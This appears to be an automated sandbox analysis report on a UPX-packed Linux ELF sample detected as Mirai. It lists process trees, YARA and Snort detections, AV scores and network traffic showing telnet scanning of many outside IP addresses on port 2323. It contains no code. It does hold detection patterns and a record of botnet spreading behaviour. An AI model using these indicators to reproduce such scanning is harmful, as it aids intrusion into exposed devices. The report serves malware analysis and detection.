  • rsyslogd (PID: 5765, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5770, Parent: 1)
  • journalctl (PID: 5770, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5772, Parent: 1)
  • systemd-journald (PID: 5772, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5773, Parent: 1)
  • gdm3 (PID: 5773, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5776, Parent: 5773)
    • plymouth (PID: 5776, Parent: 5773, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5790, Parent: 5773)
    • gdm-session-worker (PID: 5790, Parent: 5773, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5796, Parent: 5790, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
    • gdm3 New Fork (PID: 5804, Parent: 5773)
    • Default (PID: 5804, Parent: 5773, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5805, Parent: 5773)
    • Default (PID: 5805, Parent: 5773, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5777, Parent: 1)
  • accounts-daemon (PID: 5777, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5781, Parent: 5777, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5782, Parent: 5781, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5783, Parent: 5782, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5784, Parent: 5783)
          • locale (PID: 5784, Parent: 5783, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5785, Parent: 5783)
          • grep (PID: 5785, Parent: 5783, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 5788, Parent: 1)
  • journalctl (PID: 5788, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5794, Parent: 1)
  • systemd (PID: 5794, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 5802, Parent: 5794)
      • systemd New Fork (PID: 5803, Parent: 5802)
      • 30-systemd-environment-d-generator (PID: 5803, Parent: 5802, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
    • systemd New Fork (PID: 5907, Parent: 5794)
    • systemctl (PID: 5907, Parent: 5794, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
    • systemd New Fork (PID: 5909, Parent: 5794)
    • pulseaudio (PID: 5909, Parent: 5794, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5797, Parent: 1)
  • whoopsie (PID: 5797, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5807, Parent: 1)
  • dbus-daemon (PID: 5807, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5811, Parent: 1)
  • systemd-logind (PID: 5811, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5868, Parent: 1860)
  • pulseaudio (PID: 5868, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5870, Parent: 1)
  • rtkit-daemon (PID: 5870, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5874, Parent: 1)
  • gpu-manager (PID: 5874, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5876, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5877, Parent: 5876)
      • grep (PID: 5877, Parent: 5876, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5884, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5886, Parent: 5884)
      • grep (PID: 5886, Parent: 5884, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5887, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5888, Parent: 5887)
      • grep (PID: 5888, Parent: 5887, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5890, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5891, Parent: 5890)
      • grep (PID: 5891, Parent: 5890, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5892, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5894, Parent: 5892)
      • grep (PID: 5894, Parent: 5892, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5898, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5899, Parent: 5898)
      • grep (PID: 5899, Parent: 5898, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5901, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5902, Parent: 5901)
      • grep (PID: 5902, Parent: 5901, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5905, Parent: 5874, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5906, Parent: 5905)
      • grep (PID: 5906, Parent: 5905, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5875, Parent: 1)
  • polkitd (PID: 5875, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5885, Parent: 1)
  • agetty (PID: 5885, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5889, Parent: 1)
  • rsyslogd (PID: 5889, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5893, Parent: 1)
  • journalctl (PID: 5893, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5900, Parent: 1)
  • systemd-journald (PID: 5900, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5911, Parent: 1)
  • generate-config (PID: 5911, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5913, Parent: 5911, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5912, Parent: 1860)
  • dbus-daemon (PID: 5912, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5916, Parent: 1)
  • whoopsie (PID: 5916, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5920, Parent: 1)
  • dbus-daemon (PID: 5920, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5923, Parent: 1)
  • systemd-logind (PID: 5923, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5980, Parent: 1)
  • gdm-wait-for-drm (PID: 5980, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5983, Parent: 1860)
  • pulseaudio (PID: 5983, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5985, Parent: 1)
  • rtkit-daemon (PID: 5985, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5989, Parent: 1)
  • polkitd (PID: 5989, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5990, Parent: 1)
  • journalctl (PID: 5990, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5995, Parent: 1)
  • agetty (PID: 5995, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5998, Parent: 1)
  • rsyslogd (PID: 5998, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 6002, Parent: 1)
  • journalctl (PID: 6002, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 6004, Parent: 1)
  • systemd-journald (PID: 6004, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 6006, Parent: 1)
  • gdm3 (PID: 6006, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 6012, Parent: 6006)
    • plymouth (PID: 6012, Parent: 6006, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 6023, Parent: 6006)
    • gdm-session-worker (PID: 6023, Parent: 6006, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm3 New Fork (PID: 6031, Parent: 6006)
    • Default (PID: 6031, Parent: 6006, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 6032, Parent: 6006)
    • Default (PID: 6032, Parent: 6006, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6010, Parent: 1)
  • journalctl (PID: 6010, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 6013, Parent: 1)
  • accounts-daemon (PID: 6013, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6018, Parent: 6013, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6019, Parent: 6018, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6020, Parent: 6019, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6021, Parent: 6020)
          • locale (PID: 6021, Parent: 6020, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6022, Parent: 6020)
          • grep (PID: 6022, Parent: 6020, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6026, Parent: 1)
  • whoopsie (PID: 6026, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 6034, Parent: 1)
  • dbus-daemon (PID: 6034, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 6039, Parent: 1)
  • systemd-logind (PID: 6039, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
VAkpLB9NSDSUSP_ELF_LNX_UPX_Compressed_FileDetects a suspicious ELF binary with UPX compressionFlorian Roth
  • 0x75fa:$s2: $Id: UPX
  • 0x75ab:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5276.1.00000000ef4583d0.000000004edce43f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5281.1.00000000ef4583d0.000000004edce43f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5275.1.00000000ef4583d0.000000004edce43f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5279.1.00000000ef4583d0.000000004edce43f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    5274.1.00000000ef4583d0.000000004edce43f.rw-.sdmpSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
    • 0x728:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x7a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x818:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x890:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0x908:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xb90:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xbe8:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc40:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xc98:$xo1: oMXKNNC\x0D\x17\x0C\x12
    • 0xcf0:$xo1: oMXKNNC\x0D\x17\x0C\x12
    Click to see the 31 entries

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: VAkpLB9NSDVirustotal: Detection: 34%Perma Link
    Source: VAkpLB9NSDReversingLabs: Detection: 39%
    Source: /usr/bin/pulseaudio (PID: 5375)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5496)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pulseaudio (PID: 5635)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pkill (PID: 5678)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/pulseaudio (PID: 5749)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pulseaudio (PID: 5868)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pkill (PID: 5913)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: /usr/bin/pulseaudio (PID: 5983)Reads CPU info from /sys: /sys/devices/system/cpu/online
    Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36462 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35688 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35690 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35692 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35694 version: TLS 1.2

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 110.180.117.97:23 -> 192.168.2.23:51002
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 189.3.92.97:23 -> 192.168.2.23:33908
    Source: TrafficSnort IDS: 492 INFO TELNET login failed 189.3.92.97:23 -> 192.168.2.23:33930
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36712 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 36712 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 54592 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58692 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 58692 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 33338 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 52596 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57906 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 40610 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 57082 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 53292 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: unknownNetwork traffic detected: HTTP traffic on port 39546 -> 60001
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 77.95.10.157:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 202.87.60.165:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 152.117.191.72:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 160.131.17.133:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 189.163.109.36:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 207.145.115.10:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 104.120.150.99:2323
    Source: global trafficTCP traffic: 192.168.2.23:62898 -> 107.250.190.158:2323
